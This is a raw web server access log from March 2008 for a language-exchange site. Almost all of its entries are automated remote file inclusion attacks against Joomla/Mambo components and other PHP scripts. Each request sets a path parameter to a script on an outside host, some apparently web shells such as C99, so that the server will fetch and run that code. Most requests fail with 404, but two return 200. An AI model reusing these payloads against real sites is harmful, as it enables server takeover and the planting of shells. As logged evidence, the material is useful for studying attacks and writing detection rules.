69.93.48.162 - - [16/Mar/2008:17:24:17 -0700] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
69.93.48.162 - - [16/Mar/2008:17:24:17 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
69.93.48.162 - - [16/Mar/2008:17:24:17 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
91.192.194.21 - - [16/Mar/2008:17:24:21 -0700] "GET /logs/access_071015.log//oneadmin/config.php?path[docroot]=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.192.194.21 - - [16/Mar/2008:17:24:25 -0700] "GET /logs/access_071015.log//oneadmin/config.php?path[docroot]=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
91.192.194.21 - - [16/Mar/2008:17:24:25 -0700] "GET /logs/access_071015.log//oneadmin/config.php?path[docroot]=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [16/Mar/2008:17:24:29 -0700] "GET /logs/access_080121.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [16/Mar/2008:17:24:30 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [16/Mar/2008:17:24:30 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.10.154.114 - - [16/Mar/2008:17:24:56 -0700] "GET /logs/access_071224.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
213.35.225.138 - - [16/Mar/2008:17:25:02 -0700] "GET /logs/access_080107.log/index.php?option=com_expose&Itemid=&mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [16/Mar/2008:17:25:24 -0700] "GET /logs/access_071224.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.26.137.64 - - [16/Mar/2008:17:25:39 -0700] "GET /logs/access_080211.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
213.35.225.138 - - [16/Mar/2008:17:25:51 -0700] "GET /logs/access_080121.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.35.225.138 - - [16/Mar/2008:17:25:52 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.35.225.138 - - [16/Mar/2008:17:25:52 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.35.225.138 - - [16/Mar/2008:17:26:41 -0700] "GET /logs/access_071224.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
158.75.35.9 - - [16/Mar/2008:17:27:39 -0700] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
158.75.35.9 - - [16/Mar/2008:17:27:40 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.86.80.16 - - [16/Mar/2008:17:27:42 -0700] "GET /logs//update/update2.php?lang=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
74.86.80.16 - - [16/Mar/2008:17:27:42 -0700] "GET //update/update2.php?lang=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
69.93.48.162 - - [16/Mar/2008:17:27:48 -0700] "GET /logs/access_071126.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
195.58.242.138 - - [16/Mar/2008:17:27:53 -0700] "GET /logs/access_080128.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.52.24.58 - - [16/Mar/2008:17:28:02 -0700] "GET /logs/access_080114.log//oneadmin/config.php?path[docroot]=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.96.80.40 - - [16/Mar/2008:17:28:10 -0700] "GET /logs/access_080114.log//oneadmin/config.php?path[docroot]=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.35.225.138 - - [16/Mar/2008:17:28:20 -0700] "GET /logs/access.log/index.php?option=com_expose&Itemid=&mosConfig_absolute_path=https://www.sunshinefarm.net/cart/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
75.126.41.146 - - [16/Mar/2008:17:28:44 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
158.75.35.9 - - [16/Mar/2008:17:28:53 -0700] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.118.102.153 - - [16/Mar/2008:17:29:40 -0700] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
87.118.102.153 - - [16/Mar/2008:17:29:40 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.toulouseangloexchange.com"
67.228.60.242 - - [16/Mar/2008:17:29:58 -0700] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.toulouseangloexchange.com"
67.228.60.242 - - [16/Mar/2008:17:29:58 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.toulouseangloexchange.com"
209.172.57.15 - - [16/Mar/2008:17:30:24 -0700] "GET /logs/access.log/index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://sigma.murcki.pl/mambots/editors/tinymce/jscripts/tinymce/idm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.86.80.16 - - [16/Mar/2008:17:30:30 -0700] "GET /logs/admin.php?cal_dir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
69.93.43.34 - - [16/Mar/2008:17:31:19 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
69.93.43.34 - - [16/Mar/2008:17:31:19 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
84.14.51.216 - - [16/Mar/2008:17:31:25 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.toulouseangloexchange.com"
84.14.51.216 - - [16/Mar/2008:17:31:26 -0700] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
74.52.24.58 - - [16/Mar/2008:17:31:52 -0700] "GET /logs/access_071015.log//oneadmin/config.php?path[docroot]=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.96.80.40 - - [16/Mar/2008:17:31:53 -0700] "GET /logs/access_071015.log//oneadmin/config.php?path[docroot]=http://matyie.t35.com/mic/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
75.126.41.146 - - [16/Mar/2008:17:33:32 -0700] "GET /logs/access_080114.log//oneadmin/config.php?path[docroot]=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
58.26.137.64 - - [16/Mar/2008:17:34:51 -0700] "GET /logs/access.log/admin.php?cal_dir=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [16/Mar/2008:17:34:51 -0700] "GET /admin.php?cal_dir=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [16/Mar/2008:17:34:52 -0700] "GET /logs/admin.php?cal_dir=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
80.190.134.206 - - [16/Mar/2008:17:34:55 -0700] "GET /logs/index3.php?id=http://www.discapacidadesecuador.org/cache/.ownz/lfi.gif????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.toulouseangloexchange.com"
80.190.134.206 - - [16/Mar/2008:17:35:23 -0700] "GET /index3.php?id=http://www.discapacidadesecuador.org/cache/.ownz/lfi.gif????? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.toulouseangloexchange.com"
216.130.191.252 - - [16/Mar/2008:17:36:00 -0700] "GET /logs/access_080225.log/modules/tinycontent/admin/index.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.130.191.252 - - [16/Mar/2008:17:36:00 -0700] "GET /modules/tinycontent/admin/index.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.130.191.252 - - [16/Mar/2008:17:36:00 -0700] "GET /logs/modules/tinycontent/admin/index.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.86.80.16 - - [16/Mar/2008:17:36:24 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
74.86.80.16 - - [16/Mar/2008:17:36:24 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
75.126.41.146 - - [16/Mar/2008:17:36:49 -0700] "GET /logs/access_071015.log//oneadmin/config.php?path[docroot]=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
58.26.137.64 - - [16/Mar/2008:17:37:29 -0700] "GET /logs/access_080211.log/admin.php?cal_dir=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
85.14.221.150 - - [16/Mar/2008:17:37:33 -0700] "GET //?mosConfig_absolute_path=http://safe-bx.iespana.es/test.txt???? HTTP/1.1" 200 919 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
85.14.221.150 - - [16/Mar/2008:17:37:33 -0700] "GET /logs//?mosConfig_absolute_path=http://safe-bx.iespana.es/test.txt???? HTTP/1.1" 200 4375 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
124.217.247.166 - - [16/Mar/2008:17:37:38 -0700] "GET /logs/access_071217.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [16/Mar/2008:17:37:39 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
124.217.247.166 - - [16/Mar/2008:17:37:57 -0700] "GET /logs/access_080225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.58.242.138 - - [16/Mar/2008:17:39:56 -0700] "GET /logs/access_071217.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.58.242.138 - - [16/Mar/2008:17:39:56 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [16/Mar/2008:17:40:43 -0700] "GET /logs/access_080225.log/modules/tinycontent/admin/index.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [16/Mar/2008:17:40:43 -0700] "GET /modules/tinycontent/admin/index.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [16/Mar/2008:17:40:44 -0700] "GET /logs/modules/tinycontent/admin/index.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.30.216.90 - - [16/Mar/2008:17:40:54 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
216.130.191.252 - - [16/Mar/2008:17:40:56 -0700] "GET /logs/access_071126.log/modules/tinycontent/admin/index.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
58.26.137.64 - - [16/Mar/2008:17:43:22 -0700] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [16/Mar/2008:17:43:22 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
58.26.137.64 - - [16/Mar/2008:17:43:24 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
216.134.212.72 - - [16/Mar/2008:17:43:45 -0700] "GET /logs/access.log/admin.php?cal_dir=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.134.212.72 - - [16/Mar/2008:17:43:45 -0700] "GET /admin.php?cal_dir=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.134.212.72 - - [16/Mar/2008:17:43:45 -0700] "GET /logs/admin.php?cal_dir=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.134.212.72 - - [16/Mar/2008:17:44:30 -0700] "GET /logs/access_080211.log/admin.php?cal_dir=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
202.152.32.195 - - [16/Mar/2008:17:45:58 -0700] "GET /logs/access.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
69.93.43.34 - - [16/Mar/2008:17:46:52 -0700] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
69.93.43.34 - - [16/Mar/2008:17:46:52 -0700] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
69.93.43.34 - - [16/Mar/2008:17:46:52 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
69.93.43.34 - - [16/Mar/2008:17:46:52 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
89.218.85.18 - - [16/Mar/2008:17:47:55 -0700] "GET /logs/access_071126.log/modules/tinycontent/admin/index.php?spaw_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.93.43.34 - - [16/Mar/2008:17:49:20 -0700] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
69.93.43.34 - - [16/Mar/2008:17:49:20 -0700] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.toulouseangloexchange.com"
58.26.137.64 - - [16/Mar/2008:17:49:23 -0700] "GET /logs/access_080121.log/components/com_performs/performs.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.toulouseangloexchange.com"
209.85.114.4 - - [16/Mar/2008:17:52:02 -0700] "GET /logs/access.log/index.php?visualizar=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
209.85.114.4 - - [16/Mar/2008:17:52:02 -0700] "GET /index.php?visualizar=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
213.239.175.35 - - [16/Mar/2008:17:52:02 -0700] "GET /logs/access.log/index.php?visualizar=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
213.239.175.35 - - [16/Mar/2008:17:52:02 -0700] "GET /index.php?visualizar=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:17:53:04 -0700] "GET /logs/access_080303.log//components/com_simpleboard/image_upload.php?sbp=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:17:53:04 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:17:53:05 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:17:53:06 -0700] "GET /logs/access_080303.log//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:17:53:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
116.125.113.115 - - [16/Mar/2008:17:53:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
213.239.175.35 - - [16/Mar/2008:17:53:25 -0700] "GET /logs/access_080128.log/index.php?visualizar=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
209.85.114.4 - - [16/Mar/2008:17:53:46 -0700] "GET /logs/access_080128.log/index.php?visualizar=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
195.58.242.138 - - [16/Mar/2008:17:56:06 -0700] "GET /logs/access_080128.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.58.242.138 - - [16/Mar/2008:17:56:06 -0700] "GET /logs/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.85.114.4 - - [16/Mar/2008:18:00:08 -0700] "GET /logs/access_080107.log/write.php?dir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
209.85.114.4 - - [16/Mar/2008:18:00:09 -0700] "GET /write.php?dir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
195.58.242.138 - - [16/Mar/2008:18:00:23 -0700] "GET /logs/access_080114.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.239.175.35 - - [16/Mar/2008:18:00:43 -0700] "GET /logs/access_080107.log/module_db.php?pivot_path=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
213.239.175.35 - - [16/Mar/2008:18:00:43 -0700] "GET /module_db.php?pivot_path=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.toulouseangloexchange.com"
